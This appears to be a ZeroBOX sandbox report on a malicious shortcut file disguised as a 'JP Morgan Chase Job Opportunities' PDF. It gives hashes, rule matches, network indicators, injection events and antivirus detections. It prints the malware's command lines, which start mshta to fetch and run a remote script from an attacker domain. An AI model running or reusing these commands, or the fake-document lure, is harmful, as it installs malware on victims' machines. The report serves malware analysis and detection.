Summary | ZeroBOX

JP Morgan Chase Job Opportunities.pdf.lnk

Tags: Generic Malware, Downloader, FTP, Code injection, DGA, HTTP, Socket, Escalate privileges, Create Service, KeyLogger, P2P, Internet API, DNS, Http API, Anti_VM, Steal credential, ScreenShot, Sniff Audio, GIF Format, AntiVM, AntiDebug
Category: FILE
Machine: s1_win7_x6403_us
Started: Sept. 8, 2021, 11:58 a.m.
Completed: Sept. 8, 2021, noon
Size: 724.6KB
Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=13, Archive, ctime=Wed Apr 21 18:38:09 2021, mtime=Sun Jun 20 17:22:19 2021, atime=Wed Apr 21 18:38:09 2021, length=289792, window=hide
MD5: aefa2caddfeb3bccb1e696cc2cd6955a
SHA256: 0f73d0269cf77c53a38fb5863258755e3055979a6343d15573ab2222ce75f49b
CRC32: C71CA7F8
ssdeep: 12288:DACM+Gn3OUWzGwFS4U9bZTa+ugkWQWCojChVQI9hujrCiIhUfQNd6wxW0:Dq+G3OVnW9uS6vQONfxW0
Yara
  • Generic_Malware_Zero - Generic Malware
  • Lnk_Format_Zero - LNK Format
  • anti_vm_detect - Possibly employs anti-virtualization techniques

DNS lookups (Name / Response / Post-Analysis Lookup)
  • www.googlesheetpage.org -> 139.180.164.131

Contacted IP addresses (IP Address / Status / Action)
  • 139.180.164.131 - Active - Moloch
  • 164.124.101.2 - Active - Moloch

Suricata Alerts

Flow: TCP 192.168.56.103:49170 -> 139.180.164.131:443
SID: 906200056
Signature: SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)
Category: undefined

Suricata TLS

Flow: TLSv1 192.168.56.103:49170 -> 139.180.164.131:443
Issuer: C=US, O=Let's Encrypt, CN=R3
Subject: CN=googlesheetpage.org
Fingerprint: b7:04:d9:0c:bb:bd:73:6b:08:a8:ad:84:f9:11:1b:44:43:b3:91:5d

API call: GlobalMemoryStatusEx
arguments: (none)
status: 1, return: 1, repeated: 0

request: GET https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
file: C:\Users\test22\AppData\Local\Temp\JP Morgan Chase Job Opportunities.pdf.lnk
cmdline: C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
cmdline: "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://www.googlesheetpage.org/bSQphSxgStENEhz5Y+PZCpjr/NBSWGWjjhkJi/PvaqE=
API call: NtProtectVirtualMemory
process_identifier: 2628
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
status: 1, return: 0, repeated: 0
url https://www.googlesheetpage.org/bSQphSxgStENEhz5Y
Matched rules (rule - description):
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • DebuggerException__SetConsoleCtrl - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • anti_dbg - Checks if being debugged
  • disable_dep - Bypass DEP
  • Network_DGA - Communication using DGA
  • Network_DNS - Communications use DNS
  • Network_TCP_Socket - Communications over RAW Socket
  • Create_Service - Create a windows service
  • Sniff_Audio - Record Audio
  • Escalate_priviledges - Escalate privileges
  • KeyLogger - Run a KeyLogger
  • Code_injection - Code injection with CreateRemoteThread in a remote process
  • Network_HTTP - Communications over HTTP
  • Str_Win32_Internet_API - Match Windows Inet API call
  • Network_FTP - Communications over FTP
  • ScreenShot - Take ScreenShot
  • Str_Win32_Http_API - Match Windows Http API call
  • local_credential_Steal - Steal credential
  • Network_Downloader - File Downloader
  • Network_P2P_Win - Communications over P2P network

Matched rules (rule - description):
  • DebuggerCheck__GlobalFlags - (no description)
  • DebuggerCheck__QueryInfo - (no description)
  • DebuggerCheck__RemoteAPI - (no description)
  • DebuggerHiding__Thread - (no description)
  • DebuggerHiding__Active - (no description)
  • DebuggerException__ConsoleCtrl - (no description)
  • DebuggerException__SetConsoleCtrl - (no description)
  • ThreadControl__Context - (no description)
  • SEH__vectored - (no description)
  • Check_Dlls - (no description)
  • anti_dbg - Checks if being debugged
  • antisb_threatExpert - Anti-Sandbox checks for ThreatExpert
  • disable_dep - Bypass DEP
  • win_hook - Affect hook table
API call: RegSetValueExA
key_handle: 0x000002c0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
status: 1, return: 0, repeated: 0
Process injection Process 2304 resumed a thread in remote process 2424
Process injection Process 2424 resumed a thread in remote process 2628
API call: NtResumeThread
thread_handle: 0x000002f0
suspend_count: 1
process_identifier: 2424
status: 1, return: 0, repeated: 0

API call: NtResumeThread
thread_handle: 0x00000084
suspend_count: 0
process_identifier: 2628
status: 1, return: 0, repeated: 0
Antivirus results (vendor: detection)
Lionic: Trojan.WinLNK.Nioc.4!c
CAT-QuickHeal: LNK.Agent.41324
ALYac: Trojan.Agent.LNK.Gen
Arcabit: Heur.BZC.YAX.Nioc.1.078B6D01
ESET-NOD32: LNK/Agent.GX
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.078B6D01
ViRobot: LNK.S.Downloader.742035
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.078B6D01
Tencent: Heur:Trojan.Winlnk.Downloader.wya
Ad-Aware: Heur.BZC.YAX.Nioc.1.078B6D01
Emsisoft: Heur.BZC.YAX.Nioc.1.078B6D01 (B)
McAfee-GW-Edition: LNK/Agent-FNW!AEFA2CADDFEB
FireEye: Heur.BZC.YAX.Nioc.1.078B6D01
Sophos: Troj/DownLnk-X
Ikarus: Trojan.LNK.Agent
MAX: malware (ai score=100)
Microsoft: Exploit:Win32/Aicat.A!ml
ZoneAlarm: HEUR:Trojan.WinLNK.Agent.gen
GData: Heur.BZC.YAX.Nioc.1.078B6D01
AhnLab-V3: LNK/Autorun.Gen
McAfee: LNK/Agent-FNW!AEFA2CADDFEB
VBA32: Trojan.Link.Crafted
Zoner: Probably Heur.LNKScript
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
SentinelOne: Static AI - Malicious LNK
AVG: Other:Malware-gen [Trj]